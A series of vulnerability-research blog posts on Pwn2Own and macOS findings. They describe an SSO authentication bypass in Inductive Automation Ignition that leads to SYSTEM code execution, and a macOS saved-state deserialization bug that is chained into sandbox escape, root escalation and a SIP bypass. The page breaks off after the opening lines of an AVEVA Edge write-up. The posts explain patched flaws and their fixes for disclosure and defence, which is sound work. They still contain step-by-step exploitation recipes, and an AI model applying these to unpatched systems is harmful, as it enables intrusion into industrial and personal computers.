We thank Zero Day Initiative for organizing this years edition of Pwn2Own Miami, we hope to return to a later edition!

You can find the other four write-ups here:

Pwn2Own Miami 2022: Inductive Automation Ignition Remote Code Execution

22 July 2022 at 00:00

This write-up is part 2 of a series of write-ups about the 5 vulnerabilities we demonstrated last April at Pwn2Own Miami. This is the write-up for a Remote Code Execution vulnerability in Inductive Automation Ignition, by using an authentication bypass (CVE-2022-35871).

Conformed! @daankeuper and @xnyhps from Computest Sector 7 (@sector7_nl) used a missing authentication for critical function vuln to execute code on Inductive Automation Ignition . They win $20,000 and 20 Master of Pwn points. #Pwn2Own #P2O

— Zero Day Initiative (@thezdi) April 19, 2022

The cause of this vulnerability was a weak authentication implementation when using Active Directory single sign-on. We combined this with intended(?) functionality that allowed us to execute Python code on the server (as SYSTEM).

Background

Inductive Automation Ignition is an application that was part of in the “Control Server” category. Control servers are used to supervise and communicate with lower-level devices, such as PLCs. This makes them a critical element in any ICS network.

Ignition is organized in different projects, which are managed using a web interface. Each project needs a user source which determines the authentication and authorization for that project. Authentication can be internal, using a database, or based on Active Directory (which has some sub-options that determine how authorization is handled). The projects can then be used from Ignition Perspective, a desktop application which communicates with the Ignition server through the gateway API.

When one of the AD based user sources is configured, it offers an option named “SSO Enabled”.

To configure an AD based user source, the server needs to be configured with an AD account, the IP address of a domain controller and the Active Directory domain name. The AD account is used to set up an LDAP connection to the AD server for the application itself.

Vulnerability

Auth bypass

While, looking at the decompiled Java code (Ignition/lib/core/gateway/gateway-api-8.1.16.jar) for how the SSO authentication is handled in the gateway API, we noticed that the function implementing SSO is a lot simpler than we expected.

com.inductiveautomation.ignition.gateway.authentication.impl.ActiveDirectoryUserSource.class:

protected AuthenticatedUser authenticateAdSso(AuthChallenge challenge) throws Exception {
    String ssoUname = (String)challenge.get(User.Username);
    String ssoDomain = (String)challenge.get(ADSSOAuthChallenge.ADDomain);
    if (StringUtils.isBlank(ssoUname)) {
      this.log.debug("SSO username is blank.");
      return null;
    } 
    if (StringUtils.isBlank(ssoDomain)) {
      this.log.debugf("SSO domain is blank for user '%s'", new Object[] { ssoUname });
      return null;
    } 
    if (ssoDomain.equalsIgnoreCase(this.domain)) {
      User existingUser = this.userSource.findSSOUser(ssoUname);
      if (existingUser != null)
        return (AuthenticatedUser)new BasicAuthenticatedUser(existingUser, new Date()); 
      this.log.debug(String.format("Existing user was not found for username '%s'", new Object[] { ssoUname }));
    } else {
      this.log.debug(String.format("SSO domains did not match! Compared '%s' and '%s'", new Object[] { this.domain, ssoDomain }));
    } 
    return null;
  }

This function receives an AuthChallenge object (essentially a JSON dictionary). It checks that it contains a key for the username and a key for the SSO domain. Then it compares the value for the SSO domain to the configured Active Directory domain name. If it matches, it looks up the username using LDAP and, if found, returns it as an AuthenticatedUser object.

There’s no check here for a password, token, signature, or anything like that. The only data that needs to be submitted to the server is the username and the Active Directory domain name. In other words, the vulnerability here is that there is no SSO implementation at all! It’s not even clear to us what type of SSO was intended to be used here, probably Kerberos?

RCE

To go from an authenticated user to code execution, we used what we assume is intended functionality that allows us to evaluate Python on the server. There is a ScriptInvoke gateway API endpoint with an execute function. Authenticated users can submit Python code to this endpoint, which is executed on the server with the same privileges as the server (on Windows, this is SYSTEM). Ignition Designer offers the ability to execute scripts on the server in response to specific events or regular intervals. This does not appear to require any special role or permissions, so this design looks risky to us, but it does seem to function as designed.

Exploit

To exploit the auth bypass, the server needs to be configured using AD authentication with SSO enabled. To perform the attack, we need the following information:

  1. The name of a project using this authentication method.
  2. The name of an existing AD user.
  3. The name of the AD domain.

It turns out that the first two were easy to do. There is an unauthenticated API endpoint on the admin interface returning the list of all projects:

http://<server IP>/data/perspective/projects

For the username, this simply had to be any existing AD user, regardless of permissions in AD or Ignition. So, we could just use “Administrator”, as that user will always exist in AD.

This only leaves the AD domain name, which we didn’t find a way to obtain automatically from Ignition. In practice, that value should be easy to obtain when attacking a company, especially if the attacker is already on the company’s internal network. In most cases this would just be the company’s primary domain name, or the value might leak in email headers, file metadata, etc.

Finally, we used a reverse shell implemented in Python to setup a connection back to our attacker machine.

Impact

Exploiting these vulnerabilities would grant us code execution on the machine hosting Ignition. This means that we could immediately manipulate or disrupt any process handled by or via this server. For example, we might be able to take over the communication with PLCs. In addition, the SYSTEM privileges would make it a fantastic starting point for further attacks other parts of the ICS or IT network.

In most cases, the Ignition server will not be exposed publicly to the internet, but only available on the internal ICS network. Therefore, this vulnerability would need to be combined with different vulnerabilities or attacks that grant us access to that network.

The fix

This vulnerability was addressed by Inductive Automation in versions 8.1.17 and 7.9.20 and assigned CVE-2022-35871. AD User Sources now disable the “SSO Enabled” setting automatically, unless a specific flag is set on the server (-Dignition.enableInsecureAdSso=true). In other words, Inductive Automation has chosen to deprecate this feature and documented that it is dangerous to use. This may seem like a disappointing fix, but implementing a secure SSO protocol would likely have taken a lot more time. This way the vulnerability can be avoided and, if desired, Inductive Automation could implement a secure SSO protocol without time pressure.

Thoughts

When implementing security critical features (such as authentication), it is important to make a good design first. When authentication is combined with single sign-on and native applications this is even more important, as it can become very complex. With such a design, it becomes possible to catch mistakes before the features are implemented and to test each part separately.

While we of course don’t know how this feature was built, we suspect no such design was created. Having a cryptographic protocol like Kerberos completely missing from the implementation should be quite obvious if the feature had been fully designed first.

Features allowing users to execute their own code on a server can be required in certain use-cases. However, the fact that this was available for a user who did not have any permissions or roles explicitly assigned to them is worrisome. This means that any authentication bypass immediately becomes an RCE vulnerability.

Conclusion

We’ve demonstrated a remote code execution vulnerability against Inductive Automation Ignition. We found that authentication can be bypassed on a server with AD single sign-on enabled. The (cryptographic) protocol for handling single sign-on appears to not be implemented at all.

After bypassing the authentication, we used functionality of the server to execute arbitrary Python code with SYSTEM privileges to set up a reverse shell.

Big shout-out to Inductive Automation on handling this years edition of Pwn2Own! They published all details of all findings on their website, including a extensive write-up of their thoughts and fixes. Well done!

We thank Zero Day Initiative for organizing this years edition of Pwn2Own Miami, we hope to return to a later edition!

You can find the other four write-ups here:

Process injection: breaking all macOS security layers with a single vulnerability

12 August 2022 at 00:00

If you have created a new macOS app with Xcode 13.2, you may noticed this new method in the template:

- (BOOL)applicationSupportsSecureRestorableState:(NSApplication *)app {
	return YES;
}

This was added to the Xcode template to address a process injection vulnerability we reported!

In October 2021, Apple fixed CVE-2021-30873. This was a process injection vulnerability affecting (essentially) all macOS AppKit-based applications. We reported this vulnerability to Apple, along with methods to use this vulnerability to escape the sandbox, elevate privileges to root and bypass the filesystem restrictions of SIP. In this post, we will first describe what process injection is, then the details of this vulnerability and finally how we abused it.

This research was also published at Black Hat USA 2022 and DEF CON 30.

Process injection

Process injection is the ability for one process to execute code in a different process. In Windows, one reason this is used is to evade detection by antivirus scanners, for example by a technique known as DLL hijacking. This allows malicious code to pretend to be part of a different executable. In macOS, this technique can have significantly more impact than that due to the difference in permissions two applications can have.

In the classic Unix security model, each process runs as a specific user. Each file has an owner, group and flags that determine which users are allowed to read, write or execute that file. Two processes running as the same user have the same permissions: it is assumed there is no security boundary between them. Users are security boundaries, processes are not. If two processes are running as the same user, then one process could attach to the other as a debugger, allowing it to read or write the memory and registers of that other process. The root user is an exception, as it has access to all files and processes. Thus, root can always access all data on the computer, whether on disk or in RAM.

This was, in essence, the same security model as macOS until the introduction of SIP, also known as “rootless”. This name doesn’t mean that there is no root user anymore, but it is now less powerful on its own. For example, certain files can no longer be read by the root user unless the process also has specific entitlements. Entitlements are metadata that is included when generating the code signature for an executable. Checking if a process has a certain entitlement is an essential part of many security measures in macOS. The Unix ownership rules are still present, this is an additional layer of permission checks on top of them. Certain sensitive files (e.g. the Mail.app database) and features (e.g. the webcam) are no longer possible with only root privileges but require an additional entitlement. In other words, privilege escalation is not enough to fully compromise the sensitive data on a Mac.

For example, using the following command we can see the entitlements of Mail.app:

$ codesign -dvvv --entitlements - /System/Applications/Mail.app

In the output, we see the following entitlement:

...
	[Key] com.apple.rootless.storage.Mail
	[Value]
		[Bool] true
...

This is what grants Mail.app the permission to read the SIP protected mail database, while other malware will not be able to read it.

Aside from entitlements, there are also the permissions handled by Transparency, Consent and Control (TCC). This is the mechanism by which applications can request access to, for example, the webcam, microphone and (in recent macOS versions) also files such as those in the Documents and Download folders. This means that even applications that do not use the Mac Application sandbox might not have access to certain features or files.

Of course entitlements and TCC permissions would be useless if any process can just attach as a debugger to another process of the same user. If one application has access to the webcam, but the other doesn’t, then one process could attach as a debugger to the other process and inject some code to steal the webcam video. To fix this, the ability to debug other applications has been heavily restricted.

Changing a security model that has been used for decades to a more restrictive model is difficult, especially in something as complicated as macOS. Attaching debuggers is just one example, there are many similar techniques that could be used to inject code into a different process. Apple has squashed many of these techniques, but many other ones are likely still undiscovered.

Aside from Apple’s own code, these vulnerabilities could also occur in third-party software. It’s quite common to find a process injection vulnerability in a specific application, which means that the permissions (TCC permissions and entitlements) of that application are up for grabs for all other processes. Getting those fixed is a difficult process, because many third-party developers are not familiar with this new security model. Reporting these vulnerabilities often requires fully explaining this new model! Especially Electron applications are infamous for being easy to inject into, as it is possible to replace their JavaScript files without invalidating the code signature.

More dangerous than a process injection vulnerability in one application is a process injection technique that affects multiple, or even all, applications. This would give access to a large number of different entitlements and TCC permissions. A generic process injection vulnerability affecting all applications is a very powerful tool, as we’ll demonstrate in this post.

The saved state vulnerability

When shutting down a Mac, it will prompt you to ask if the currently open windows should be reopened the next time you log in. This is a part of functionally called “saved state” or “persistent UI”.

When reopening the windows, it can even restore new documents that were not yet saved in some applications.

It is used in more places than just at shutdown. For example, it is also used for a feature called App Nap. When application has been inactive for a while (has not been the focused application, not playing audio, etc.), then the system can tell it to save its state and terminates the process. macOS keeps showing a static image of the application’s windows and in the Dock it still appears to be running, while it is not. When the user switches back to the application, it is quickly launched and resumes its state. Internally, this also uses the same saved state functionality.

When building an application using AppKit, support for saving the state is for a large part automatic. In some cases the application needs to include its own objects in the saved state to ensure the full state can be recovered, for example in a document-based application.

Each time an application loses focus, it writes to the files:

~/Library/Saved Application State/<Bundle ID>.savedState/windows.plist
~/Library/Saved Application State/<Bundle ID>.savedState/data.data

The windows.plist file contains a list of all of the application’s open windows. (And some other things that don’t look like windows, such as the menu bar and the Dock menu.)

For example, a windows.plist for TextEdit.app could look like this:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<array>
	<dict>
		<key>MenuBar AvailableSpace</key>
		<real>1248</real>
		<key>NSDataKey</key>
		<data>
		Ay1IqBriwup4bKAanpWcEw==
		</data>
		<key>NSIsMainMenuBar</key>
		<true/>
		<key>NSWindowID</key>
		<integer>1</integer>
		<key>NSWindowNumber</key>
		<integer>5978</integer>
	</dict>
	<dict>
		<key>NSDataKey</key>
		<data>
		5lyzOSsKF24yEcwAKTBSVw==
		</data>
		<key>NSDragRegion</key>
		<data>
		AAAAgAIAAADAAQAABAAAAAMAAABHAgAAxgEAAAoAAAADAAAABwAAABUAAAAb
		AAAAKQAAAC8AAAA9AAAARwIAAMcBAAAMAAAAAwAAAAcAAAAVAAAAGwAAACkA
		AAAvAAAAPQAAAAkBAABLAQAARwIAANABAAAKAAAAFQAAABsAAAApAAAALwAA
		AD0AAAAJAQAASwEAAD4CAADWAQAABgAAAAwAAAAJAQAASwEAAD4CAADXAQAA
		BAAAAAwAAAA+AgAA2QEAAAIAAAD///9/
		</data>
		<key>NSTitle</key>
		<string>Untitled</string>
		<key>NSUIID</key>
		<string>_NS:34</string>
		<key>NSWindowCloseButtonFrame</key>
		<string>{{7, 454}, {14, 16}}</string>
		<key>NSWindowFrame</key>
		<string>177 501 586 476 0 0 1680 1025 </string>
		<key>NSWindowID</key>
		<integer>2</integer>
		<key>NSWindowLevel</key>
		<integer>0</integer>
		<key>NSWindowMiniaturizeButtonFrame</key>
		<string>{{27, 454}, {14, 16}}</string>
		<key>NSWindowNumber</key>
		<integer>5982</integer>
		<key>NSWindowWorkspaceID</key>
		<string></string>
		<key>NSWindowZoomButtonFrame</key>
		<string>{{47, 454}, {14, 16}}</string>
	</dict>
	<dict>
		<key>CFBundleVersion</key>
		<string>378</string>
		<key>NSDataKey</key>
		<data>
		P7BYxMryj6Gae9Q76wpqVw==
		</data>
		<key>NSDockMenu</key>
		<array>
			<dict>
				<key>command</key>
				<integer>1</integer>
				<key>mark</key>
				<integer>2</integer>
				<key>name</key>
				<string>Untitled</string>
				<key>system-icon</key>
				<integer>1735879022</integer>
				<key>tag</key>
				<integer>2</integer>
			</dict>
			<dict>
				<key>separator</key>
				<true/>
			</dict>
			<dict>
				<key>command</key>
				<integer>2</integer>
				<key>indent</key>
				<integer>0</integer>
				<key>name</key>
				<string>New Document</string>
				<key>tag</key>
				<integer>0</integer>
			</dict>
		</array>
		<key>NSExecutableInode</key>
		<integer>1152921500311961010</integer>
		<key>NSIsGlobal</key>
		<true/>
		<key>NSSystemAppearance</key>
		<data>
		YnBsaXN0MDDUAQIDBAUGBwpYJHZlcnNpb25ZJGFyY2hpdmVyVCR0b3BYJG9i
		amVjdHMSAAGGoF8QD05TS2V5ZWRBcmNoaXZlctEICVRyb290gAGkCwwRElUk
		bnVsbNINDg8QViRjbGFzc18QEE5TQXBwZWFyYW5jZU5hbWWAA4ACXxAUTlNB
		cHBlYXJhbmNlTmFtZUFxdWHSExQVFlokY2xhc3NuYW1lWCRjbGFzc2VzXE5T
		QXBwZWFyYW5jZaIVF1hOU09iamVjdAgRGiQpMjdJTFFTWF5jan1/gZidqLG+
		wQAAAAAAAAEBAAAAAAAAABgAAAAAAAAAAAAAAAAAAADK
		</data>
		<key>NSSystemVersion</key>
		<array>
			<integer>12</integer>
			<integer>2</integer>
			<integer>1</integer>
		</array>
		<key>NSWindowID</key>
		<integer>4294967295</integer>
		<key>NSWindowZOrder</key>
		<array>
			<integer>5982</integer>
		</array>
	</dict>
</array>
</plist>

The data.data file contains a custom binary format. It consists of a list of records, each record contains an AES-CBC encrypted serialized object. The windows.plist file contains the key (NSDataKey) and a ID (NSWindowID) for the record from data.data it corresponds to.1

For example:

00000000  4e 53 43 52 31 30 30 30  00 00 00 01 00 00 01 b0  |NSCR1000........|
00000010  ec f2 26 b9 8b 06 c8 d0  41 5d 73 7a 0e cc 59 74  |..&.....A]sz..Yt|
00000020  89 ac 3d b3 b6 7a ab 1b  bb f7 84 0c 05 57 4d 70  |..=..z.......WMp|
00000030  cb 55 7f ee 71 f8 8b bb  d4 fd b0 c6 28 14 78 23  |.U..q.......(.x#|
00000040  ed 89 30 29 92 8c 80 bf  47 75 28 50 d7 1c 9a 8a  |..0)....Gu(P....|
00000050  94 b4 d1 c1 5d 9e 1a e0  46 62 f5 16 76 f5 6f df  |....]...Fb..v.o.|
00000060  43 a5 fa 7a dd d3 2f 25  43 04 ba e2 7c 59 f9 e8  |C..z../%C...|Y..|
00000070  a4 0e 11 5d 8e 86 16 f0  c5 1d ac fb 5c 71 fd 9d  |...]........\q..|
00000080  81 90 c8 e7 2d 53 75 43  6d eb b6 aa c7 15 8b 1a  |....-SuCm.......|
00000090  9c 58 8f 19 02 1a 73 99  ed 66 d1 91 8a 84 32 7f  |.X....s..f....2.|
000000a0  1f 5a 1e e8 ae b3 39 a8  cf 6b 96 ef d8 7b d1 46  |.Z....9..k...{.F|
000000b0  0c e2 97 d5 db d4 9d eb  d6 13 05 7d e0 4a 89 a4  |...........}.J..|
000000c0  d0 aa 40 16 81 fc b9 a5  f5 88 2b 70 cd 1a 48 94  |[email protected]+p..H.|
000000d0  47 3d 4f 92 76 3a ee 34  79 05 3f 5d 68 57 7d b0  |G=O.v:.4y.?]hW}.|
000000e0  54 6f 80 4e 5b 3d 53 2a  6d 35 a3 c9 6c 96 5f a5  |To.N[=S*m5..l._.|
000000f0  06 ec 4c d3 51 b9 15 b8  29 f0 25 48 2b 6a 74 9f  |..L.Q...).%H+jt.|
00000100  1a 5b 5e f1 14 db aa 8d  13 9c ef d6 f5 53 f1 49  |.[^..........S.I|
00000110  4d 78 5a 89 79 f8 bd 68  3f 51 a2 a4 04 ee d1 45  |MxZ.y..h?Q.....E|
00000120  65 ba c4 40 ad db e3 62  55 59 9a 29 46 2e 6c 07  |[email protected])F.l.|
00000130  34 68 e9 00 89 15 37 1c  ff c8 a5 d8 7c 8d b2 f0  |4h....7.....|...|
00000140  4b c3 26 f9 91 f8 c4 2d  12 4a 09 ba 26 1d 00 13  |K.&....-.J..&...|
00000150  65 ac e7 66 80 c0 e2 55  ec 9a 8e 09 cb 39 26 d4  |e..f...U.....9&.|
00000160  c8 15 94 d8 2c 8b fa 79  5f 62 18 39 f0 a5 df 0b  |....,..y_b.9....|
00000170  3d a4 5c bc 30 d5 2b cc  08 88 c8 49 d6 ab c0 e1  |=.\.0.+....I....|
00000180  c1 e5 41 eb 3e 2b 17 80  c4 01 64 3d 79 be 82 aa  |..A.>+....d=y...|
00000190  3d 56 8d bb e5 7a ea 89  0f 4c dc 16 03 e9 2a d8  |=V...z...L....*.|
000001a0  c5 3e 25 ed c2 4b 65 da  8a d9 0d d9 23 92 fd 06  |.>%..Ke.....#...|
[...]

Whenever an application is launched, AppKit will read these files and restore the windows of the application. This happens automatically, without the app needing to implement anything. The code for reading these files is quite careful: if the application crashed, then maybe the state is corrupted too. If the application crashes while restoring the state, then the next time the state is discarded and it does a fresh start.

The vulnerability we found is that the encrypted serialized object stored in the data.data file was not using “secure coding”. To explain what that means, we’ll first explain serialization vulnerabilities, in particular on macOS.

Serialized objects

Many object-oriented programming languages have added support for binary serialization, which turns an object into a bytestring and back. Contrary to XML and JSON, these are custom, language specific formats. In some programming languages, serialization support for classes is automatic, in other languages classes can opt-in.

In many of those languages these features have lead to vulnerabilities. The problem in many implementations is that an object is created first, and then its type is checked. Methods may be called on these objects when creating or destroying them. By combining objects in unusual ways, it is sometimes possible to gain remote code execution when a malicious object is deserialized. It is, therefore, not a good idea to use these serialization functions for any data that might be received over the network from an untrusted party.

For Python pickle and Ruby Marshall.load remote code execution is straightforward. In Java ObjectInputStream.readObject and C#, RCE is possible if certain commonly used libraries are used. The ysoserial and ysoserial.net tools can be used to generate a payload depending on the libraries in use. In PHP, exploitability for RCE is rare.

Objective-C serialization

In Objective-C, classes can implement the NSCoding protocol to be serializable. Subclasses of NSCoder, such as NSKeyedArchiver and NSKeyedUnarchiver, can be used to serialize and deserialize these objects.

How this works in practice is as follows. A class that implements NSCoding must include a method:

- (id)initWithCoder:(NSCoder *)coder;

In this method, this object can use coder to decode its instance variables, using methods such as -decodeObjectForKey:, -decodeIntegerForKey:, -decodeDoubleForKey:, etc. When it uses -decodeObjectForKey:, the coder will recursively call -initWithCoder: on that object, eventually decoding the entire graph of objects.

Apple has also realized the risk of deserializing untrusted input, so in 10.8, the NSSecureCoding protocol was added. The documentation for this protocol states:

A protocol that enables encoding and decoding in a manner that is robust against object substitution attacks.

This means that instead of creating an object first and then checking its type, a set of allowed classes needs to be included when decoding an object.

So instead of the unsafe construction:

id obj = [decoder decodeObjectForKey:@"myKey"];
if (![obj isKindOfClass:[MyClass class]]) { /* ...fail... */ }

The following must be used:

id obj = [decoder decodeObjectOfClass:[MyClass class] forKey:@"myKey"];

This means that when a secure coder is created, -decodeObjectForKey: is no longer allowed, but -decodeObjectOfClass:forKey: must be used.

That makes exploitable vulnerabilities significantly harder, but it could still happen. One thing to note here is that subclasses of the specified class are allowed. If, for example, the NSObject class is specified, then all classes implementing NSCoding are still allowed. If only NSDictionary are expected and an imported framework contains a rarely used and vulnerable subclass of NSDictionary, then this could also create a vulnerability.

In all of Apple’s operating systems, these serialized objects are used all over the place, often for inter-process exchange of data. For example, NSXPCConnection heavily relies on secure serialization for implementing remote method calls. In iMessage, these serialized objects are even exchanged with other users over the network. In such cases it is very important that secure coding is always enabled.

Creating a malicious serialized object

In the data.data file for saved states, objects were stored using an NSKeyedArchiver without secure coding enabled. This means we could include objects of any class that implements the NSCoding protocol. The likely reason for this is that applications can extend the saved state with their own objects, and because the saved state functionality is older than NSSecureCoding, Apple couldn’t just upgrade this to secure coding, as this could break third-party applications.

To exploit this, we wanted a method for constructing a chain of objects that could allows us to execute arbitrary code. However, no project similar to ysoserial for Objective-C appears to exist and we could not find other examples of abusing insecure deserialization in macOS. In Remote iPhone Exploitation Part 1: Poking Memory via iMessage and CVE-2019-8641 Samuel Groß of Google Project Zero describes an attack against a secure coder by abusing a vulnerability in NSSharedKeyDictionary, an uncommon subclass of NSDictionary. As this vulnerability is now fixed, we couldn’t use this.

By decompiling a large number of -initWithCoder: methods in AppKit, we eventually found a combination of 2 objects that we could use to call arbitrary Objective-C methods on another deserialized object.

We start with NSRuleEditor. The -initWithCoder: method of this class creates a binding to an object from the same archive with a key path also obtained from the archive.

Bindings are a reactive programming technique in Cocoa. It makes it possible to directly bind a model to a view, without the need for the boilerplate code of a controller. Whenever a value in the model changes, or the user makes a change in the view, the changes are automatically propagated.

A binding is created calling the method:

- (void)bind:(NSBindingName)binding 
    toObject:(id)observable 
 withKeyPath:(NSString *)keyPath 
     options:(NSDictionary<NSBindingOption, id> *)options;

This binds the property binding of the receiver to the keyPath of observable. A keypath a string that can be used, for example, to access nested properties of the object. But the more common method for creating bindings is by creating them as part of a XIB file in Xcode.

For example, suppose the model is a class Person, which has a property @property (readwrite, copy) NSString *name;. Then you could bind the “value” of a text field to the “name” keypath of a Person to create a field that shows (and can edit) the person’s name.

In the XIB editor, this would be created as follows:

The different options for what a keypath can mean are actually quite complicated. For example, when binding with a keypath of “foo”, it would first check if one the methods getFoo, foo, isFoo and _foo exists. This would usually be used to access a property of the object, but this is not required. When a binding is created, the method will be called immediately when creating the binding, to provide an initial value. It does not matter if that method actually returns void. This means that by creating a binding during deserialization, we can use this to call zero-argument methods on other deserialized objects!

ID NSRuleEditor::initWithCoder:(ID param_1,SEL param_2,ID unarchiver)
{
	...

	id arrayOwner = [unarchiver decodeObjectForKey:@"NSRuleEditorBoundArrayOwner"];

	...

	if (arrayOwner) {
	  keyPath = [unarchiver decodeObjectForKey:@"NSRuleEditorBoundArrayKeyPath"];
	  [self bind:@"rows" toObject:arrayOwner withKeyPath:keyPath options:nil];
	}

	...
}

In this case we use it to call -draw on the next object.

The next object we use is an NSCustomImageRep object. This obtains a selector (a method name) as a string and an object from the archive. When the -draw method is called, it invokes the method from the selector on the object. It passes itself as the first argument:


ID NSCustomImageRep::initWithCoder:(ID param_1,SEL param_2,ID unarchiver)
{
	...
	id drawObject = [unarchiver decodeObjectForKey:@"NSDrawObject"];
	self.drawObject = drawObject;
	id drawMethod = [unarchiver decodeObjectForKey:@"NSDrawMethod"];
	SEL selector = NSSelectorFromString(drawMethod);
	self.drawMethod = selector;
	...
}

...

void ___24-[NSCustomImageRep_draw]_block_invoke(long param_1)
{
  ...
  [self.drawObject performSelector:self.drawMethod withObject:self];
  ...
}

By deserializing these two classes we can now call zero-argument methods and multiple argument methods, although the first argument will be an NSCustomImageRep object and the remaining arguments will be whatever happens to still be in those registers. Nevertheless, is a very powerful primitive. We’ll cover the rest of the chain we used in a future blog post.

Exploitation

Sandbox escape

First of all, we escaped the Mac Application sandbox with this vulnerability. To explain that, some more background on the saved state is necessary.

In a sandboxed application, many files that would be stored in ~/Library are stored in a separate container instead. So instead of saving its state in:

~/Library/Saved Application State/<Bundle ID>.savedState/

Sandboxed applications save their state to:

~/Library/Containers/<Bundle ID>/Data/Library/Saved Application State/<Bundle ID>.savedState/

Apparently, when the system is shut down while an application is still running (when the prompt is shown asking the user whether to reopen the windows the next time), the first location is symlinked to the second one by talagent. We are unsure of why, it might have something to do with upgrading an application to a new version which is sandboxed.

Secondly, most applications do not have access to all files. Sandboxed applications are very restricted of course, but with the addition of TCC even accessing the Downloads, Documents, etc. folders require user approval. If the application would open an open or save panel, it would be quite inconvenient if the user could only see the files that that application has access to. To solve this, a different process is launched when opening such a panel: com.apple.appkit.xpc.openAndSavePanelService. Even though the window itself is part of the application, its contents are drawn by openAndSavePanelService. This is an XPC service which has full access to all files. When the user selects a file in the panel, the application gains temporary access to that file. This way, users can still browse their entire disk even in applications that do not have permission to list those files.

As it is an XPC service with service type Application, it is launched separately for each app.

What we noticed is that this XPC Service reads its saved state, but using the bundle ID of the app that launched it! As this panel might be part of the saved state of multiple applications, it does make some sense that it would need to separate its state per application.

As it turns out, it reads its saved state from the location outside of the container, but with the application’s bundle ID:

~/Library/Saved Application State/<Bundle ID>.savedState/

But as we mentioned if the app was ever open when the user shut down their computer, then this will be a symlink to the container path.

Thus, we can escape the sandbox in the following way:

  1. Wait for the user to shut down while the app is open, if the symlink does not yet exist.
  2. Write malicious data.data and windows.plist files inside the app’s own container.
  3. Open an NSOpenPanel or NSSavePanel.

The com.apple.appkit.xpc.openAndSavePanelService process will now deserialize the malicious object, giving us code execution in a non-sandboxed process.

This was fixed earlier than the other issues, as CVE-2021-30659 in macOS 11.3. Apple addressed this by no longer loading the state from the same location in com.apple.appkit.xpc.openAndSavePanelService.

Privilege escalation

By injecting our code into an application with a specific entitlement, we can elevate our privileges to root. For this, we could apply the technique explained by A2nkF in Unauthd - Logic bugs FTW.

Some applications have an entitlement of com.apple.private.AuthorizationServices containing the value system.install.apple-software. This means that this application is allowed to install packages that have a signature generated by Apple without authorization from the user. For example, “Install Command Line Developer Tools.app” and “Bootcamp Assistant.app” have this entitlement. A2nkF also found a package signed by Apple that contains a vulnerability: macOSPublicBetaAccessUtility.pkg. When this package is installed to a specific disk, it will run (as root) a post-install script from that disk. The script assumes it is being installed to a disk containing macOS, but this is not checked. Therefore, by creating a malicious script at the same location it is possible to execute code as root by installing this package.

The exploitation steps are as follows:

  1. Create a RAM disk and copy a malicious script to the path that will be executed by macOSPublicBetaAccessUtility.pkg.
  2. Inject our code into an application with the com.apple.private.AuthorizationServices entitlement containing system.install.apple-software by creating the windows.plist and data.data files for that application and then launching it.
  3. Use the injected code to install the macOSPublicBetaAccessUtility.pkg package to the RAM disk.
  4. Wait for the post-install script to run.

In the writeup from A2nkF, the post-install script ran without the filesystem restrictions of SIP. It inherited this from the installation process, which needs it as package installation might need to write to SIP protected locations. This was fixed by Apple: post- and pre-install scripts are no longer SIP exempt. The package and its privilege escalation can still be used, however, as Apple still uses the same vulnerable installer package.

SIP filesystem bypass

Now that we have escaped the sandbox and elevated our privileges to root, we did want to bypass SIP as well. To do this, we looked around at all available applications to find one with a suitable entitlement. Eventually, we found something on the macOS Big Sur Beta installation disk image: “macOS Update Assistant.app” has the com.apple.rootless.install.heritable entitlement. This means that this process can write to all SIP protected locations (and it is heritable, which is convenient because we can just spawn a shell). Although it is supposed to be used only during the beta installation, we can just copy it to a normal macOS environment and run it there.

The exploitation for this is quite simple:

  1. Create malicious windows.plist and data.data files for “macOS Update Assistant.app”.
  2. Launch “macOS Update Assistant.app”.

When exempt from SIP’s filesystem restrictions, we can read all files from protected locations, such as the user’s Mail.app mailbox. We can also modify the TCC database, which means we can grant ourselves permission to access the webcam, microphone, etc. We could also persist our malware on locations which are protected by SIP, making it very difficult to remove by anyone other than Apple. Finally, we can change the database of approved kernel extensions. This means that we could load a new kernel extension silently, without user approval. When combined with a vulnerable kernel extension (or a codesigning certificate that allows signing kernel extensions), we would have been able to gain kernel code execution, which would allow disabling all other restrictions too.

Demo

We recorded the following video to demonstrate the different steps. It first shows that the application “Sandbox” is sandboxed, then it escapes its sandbox and launches “Privesc”. This elevates privileges to root and launches “SIP Bypass”. Finally, this opens a reverse shell that is exempt from SIP’s filesystem restrictions, which is demonstrated by writing a file in /var/db/SystemPolicyConfiguration (the location where the database of approved kernel modules is stored):

The fix

Apple first fixed the sandbox escape in 11.3, by no longer reading the saved state of the application in com.apple.appkit.xpc.openAndSavePanelService (CVE-2021-30659).

Fixing the rest of the vulnerability was more complicated. Third-party applications may store their own objects in the saved state and these objects might not support secure coding. This brings us back to the method from the introduction: -applicationSupportsSecureRestorableState:. Applications can now opt-in to requiring secure coding for their saved state by returning TRUE from this method. Unless an app opts in, it will keep allowing non-secure coding, which means process injection might remain possible.

This does highlight one issue with the current design of these security measures: downgrade attacks. The code signature (and therefore entitlements) of an application will remain valid for a long time, and the TCC permissions of an application will still work if the application is downgraded. A non-sandboxed application could just silently download an older, vulnerable version of an application and exploit that. For the SIP bypass this would not work, as “macOS Update Assistant.app” does not run on macOS Monterey because certain private frameworks no longer contain the necessary symbols. But that is a coincidental fix, in many other cases older applications may still run fine. This vulnerability will therefore be present for as long as there is backwards compatibility with older macOS applications!

Nevertheless, if you write an Objective-C application, please make sure you add -applicationSupportsSecureRestorableState: to return TRUE and to adapt secure coding for all classes used for your saved states!

Conclusion

In the current security architecture of macOS, process injection is a powerful technique. A generic process injection vulnerability can be used to escape the sandbox, elevate privileges to root and to bypass SIP’s filesystem restrictions. We have demonstrated how we used the use of insecure deserialization in the loading of an application’s saved state to inject into any Cocoa process. This was addressed by Apple as CVE-2021-30873.


  1. It is unclear what security the AES encryption here is meant to add, as the key is stored right next to it. There is no MAC, so no integrity check for the ciphertext. ↩︎

Pwn2Own Miami 2022: AVEVA Edge Arbitrary Code Execution

8 September 2022 at 00:00

This write-up is part 3 of a series of write-ups about the 5 vulnerabilities we demonstrated last April at Pwn2Own Miami. This is the write-up for an Arbitrary Code Execution vulnerability in AVEVA Edge (CVE-2022-28688).

Confirmed! @daankeuper & @xnyhps from @sector7_nl used an uncontrolled search path vuln to get RCE in AVEVA Edge. They win $20,000 and 20 Master of Pwn points. #Pwn2Own #P2O pic.twitter.com/5f3ECTHxDy

— Zero Day Initiative (@thezdi) April 19, 2022

